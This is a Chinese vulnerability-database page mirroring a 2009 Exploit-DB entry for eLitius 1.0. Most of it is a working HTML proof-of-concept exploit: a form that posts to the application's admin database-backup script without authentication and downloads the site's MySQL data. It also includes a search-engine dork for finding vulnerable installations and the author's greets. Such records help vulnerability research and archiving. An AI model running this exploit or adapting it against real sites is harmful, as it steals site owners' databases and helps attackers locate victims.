eLitius 1.0 - Arbitrary Database Backup

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057707 漏洞类型
发布时间 2009-04-20 更新时间 2009-04-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8498
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<title>  Powered By eLitius 1.0 Remote Database Backup </title>
<form action="http://esyndicat.org/admin/database-backup.php" method="post" name="adminForm">
  <table class="admintable">
  <tbody><tr>
   <td style="width: 40%;">
    <table class="adminform">
    <tbody>
    <tr>
     <th colspan="2">Backup MySQL Database</th>
    </tr>
    <tr>
     <td style="text-align: center;"><strong>Choose Operation:</strong></td>
    </tr>
    <tr>
     <td style="text-align: center;">
      <select name="db_op">
       
       <option value="data">Backup data only</option>
       
      </select></td>
    </tr>
    <tr>
     <td colspan="2"  style="text-align: center; width: 50%;">
      
      <input name="savetype" value="client" id="db_client" checked="checked" type="radio"/><label for="db_client">Save to your PC</label> 
      
     </td>
    </tr>
    <tr>
     <td style="padding: 10px 0; text-align: center;"><input type="submit" name="backup" value="Create Backup" /></td>
    <tr>
     <td colspan="2"> 
     </td>
    </tr>
    <tr>
     <td style="text-align: center;"></td>
    </tr>
    </tbody>
    </table>
   </td>
   <td valign="top" width="80%">
  <table class="adminform">
   <tbody>
<th colspan="2">Greets: Dos-Dz TeaM SnAkEs-TeaM H4ckF0rU TeaM  Team Sobh4n ALLAH</th>
    <tr>
</br>
    <th colspan="2">Dork: Powered By eLitius 1.0 </th></br></CENTER>
</br>
<center>Cod[3]d By ThE g0bL!N</center>
</br>
    </tr>
    <tr>

# milw0rm.com [2009-04-20]